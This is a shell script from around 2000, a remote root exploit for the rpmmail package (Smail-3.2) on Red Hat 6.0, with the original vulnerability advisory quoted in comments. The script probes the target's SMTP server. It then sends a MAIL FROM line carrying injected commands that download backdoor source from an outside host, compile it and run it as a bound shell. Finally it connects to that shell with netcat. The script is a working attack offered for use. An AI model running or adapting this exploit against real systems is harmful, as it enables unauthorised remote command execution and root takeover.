#!/bin/sh
# remote root exploit for Smail-3.2 (rpmmail) by ben-z [bentothez@phayze.com]
#  greets to: 
#   all of gH, "Brock Tellier" for discovering the hole.
#  special greets to:
#   icesk, mosthated, elux, rhodie, and the rest of #bifemlinux @ undernet
# ---- Brock Tellier's original advisory
# Greetings,
#
# A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0
# Extra Applications CD.  The potential compromise for this bug could be remote
# or local root or simply remote command execution as "nobody" or similar, 
# depending on your system configuration.
#
# By sending a carefully crafted mail message to rpmmail@vulnerablehost, you can
# get /home/rpmmail/rpmmail (suid root by default, exec'd by .forward remotely)
# to system(3) any command you wish. The command executed does not  necessarily
# have root privs because of bash's handling of euid != uid of  caller. Although
# system(3) calls /bin/sh -c, it is linked by default (can  anyone verify
# these?) on some Linux systems, such as SuSE 6.2, to /bin/bash v2.  From the 
# system(3) man page:
#
#      system() will not, in fact, work properly from  programs  
#       with suid or sgid privileges on systems on which
#      /bin/sh is bash version 2, since bash 2  drops  privileges
#       on  startup.   (Debian uses a modified bash which does not
#       do this when invoked as sh.)
#  
# Thus some systems with rpmmail installed are vulnerable to local/remote root, 
# all others to remote command execution as an unpriv'd user.
# --- end Brock's text

# you need to have backdoor source somewhere out on the net
BACKDOOR="http://meltingpot.fortunecity.com/rundberg/521/blackhole.c "

if [ "$1" = "" ]; then
 echo "usage: $0 <host>"
 exit 0
fi

if [ `which nc` = "" ]; then
 echo "this script requires netcat [nc]"
 exit 0
fi

rmt=`host $1 | grep -i "$1" | grep -i "has address" | awk '{print $4}'`
if [ "$rmt" = "" ]; then
 echo "unable to obtain address for $1"
 exit 0
fi

echo "= remote exploit for Smail-3.2 (rpmmail) by ben-z [bentothez@phayze.com] ="
echo -n "[**]: Making sure the system is vulnerable.. "
(sleep 1;echo "EXPN rpmmail";sleep 1)|nc -w 4 $1 25 1>vuln.tmp 2>vuln.tmp
cat vuln.tmp | grep "250" | grep "rpmmail -c" >/dev/null 2>&1
if [ ! $? -eq 0 ]; then
 echo "no!"
 exit 0
fi
echo "yes!"

echo -n "[**]: Setting up our tcp bound shell.. "
(sleep 1;echo 'MAIL FROM: ;lynx\x20-dump\x20$BACKDOOR\x201>unf.c\x202>unf.c\x20;gcc\x20-o\x20unf\x20unf.c\x20;./unf\x20&;';sleep 1;echo "RCPT TO: rpmmail";sleep 1;echo "DATA";sleep 1;echo "unf";echo ".";sleep 2;echo "quit")|nc -w 4 $1 25 1>vuln.tmp 2>vuln.tmp
cat vuln.tmp | grep -i " 250 Mail accepted" >/dev/null 2>&1
if [ ! $? -eq 0 ]; then
 echo "failed!"
 exit 0
fi
echo "success!"

echo -n "[**]: Attempting to obtain access.. "
nc -w 3 $1 5300
echo "done."

echo -n "[**]: Cleaning up local mess.. "
rm vuln.tmp
killall -9 nc 1>/dev/null 2>/dev/null
echo "done."


#                 www.hack.co.za           [2000]#